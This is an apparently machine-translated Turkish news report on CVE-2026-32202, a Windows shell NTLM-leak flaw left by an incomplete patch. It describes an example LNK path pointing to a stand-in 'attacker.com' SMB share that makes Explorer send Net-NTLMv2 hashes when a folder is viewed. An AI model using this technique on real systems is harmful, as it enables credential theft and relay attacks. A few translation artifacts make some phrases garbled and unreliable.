Microsoft, Şubat Salı günü Yama'da Windows kabuğundaki bir güvenlik açığını (CVE-2026-21510) yamaladı; bu güvenlik açığı, daha çok Fancy Bear olarak bilinen APT28 siber grubu tarafından vahşi doğada saldırıya uğradı. Yama yetersizdi ve başka bir güvenlik açığı bıraktı. Ve şimdi internette de saldırıya uğruyor.
Duyurudan sonra devamını okuyun
Microsoft yeni güvenlik açığı CVE-2026-32202'yi (CVSS) yayımladı 4.3risk”orta“), Nisan ayındaki Yama Günü'nde yazılım yamalarıyla düzeltildi. Ancak geliştiriciler, güvenlik açığı girişini Pazartesi günü güncellediler: Windows kabuğundaki kimlik sahtekarlığı deliğinden artık genel olarak saldırganlar da yararlanıyor. Etkiler, Şubat ayındaki yetersiz yamadan önceki kadar ciddi görünmüyor.
Saldırganlar bazı hassas bilgilere erişebilir ancak bilgileri değiştiremez veya kaynakları engelleyemez. Microsoft ayrıca, kötü niyetli aktörlerin ağ üzerinde kimlik sahtekarlığı saldırıları gerçekleştirmesine olanak tanıyan bir koruma mekanizmasının arızalı olduğunu da açıklıyor. Ancak Microsoft'a göre bu, kurbanların saldırganlar tarafından kendilerine gönderilen kötü amaçlı bir dosyayı yürütmesini gerektiriyor. Güncellemenin Patchday'den yüklenmesi, güvenlik açığının kötüye kullanılmasına karşı koruma sağlar.
Güvenlik açığı bağlamı
Ancak Akamai blogda daha ayrıntılı bir analiz yayınladı. BT analistleri, Microsoft'tan farklı olarak yeni güvenlik açığını tıklama gerektirmeyen güvenlik açığı olarak sınıflandırıyor. Daha sonra kurbanın bilgisayarları, kullanıcı etkileşimi olmadan saldırganın sunucusunda kimlik doğrulaması yapar. Orijinal saldırı, ağ üzerinden kötü amaçlı kod yürütülmesine izin verdi (RCE, Uzaktan Kod Yürütme). İlk yama, SmartScreen'i kullanarak CPL dosyalarını işaret eden imzasız veya güvenilmeyen LNK dosyalarını engelledi. Ancak programcılar kod yolunda bir noktayı gözden kaçırdılar: Windows Gezgini, hedef dosya olan .cpl için .lnk gibi dosyalardan bir simge çıkarmaya çalışıyor. Ve burada, harici SMB sunucularına bağlantı da dahil olmak üzere bir yol kontrolü gerçekleştirilir. Bu, kullanıcıların başka bir tıklaması olmadan dizin görüntülendiğinde gerçekleşir.
Örneğin, LNK dosyası “\attacker.comsharepayload.cpl” bağlantısı içerir; bu bağlantı, dizini listelerken bilgisayarın “\attacker.com” SMB sunucusuyla bağlantı kurmasına neden olur ve böylece saldırganlara kurbanın bilgisayarının Net-NTLMv2 karmasını gönderen otomatik bir NTLM kimlik doğrulamasını başlatır. Akamai, bunun daha sonra NTLM yönlendirme saldırılarında ve çevrimdışı kırma amacıyla kötüye kullanılabileceğini açıklıyor.
Haberler-security-Pro web semineri “Active Directory'de Kimlik Doğrulamanın Güvenliğinin Sağlanması: Eski Microsoft Kavramlarıyla (Hayatta Kalmak)”, yöneticilere Net-NTLM hakkında ayrıntılı açıklamalar ve arka plan bilgileri içeren bir güvenlik kılavuzu sağlar.
Duyurudan sonra devamını okuyun
(Bilmiyorum)
Bir yanıt yazın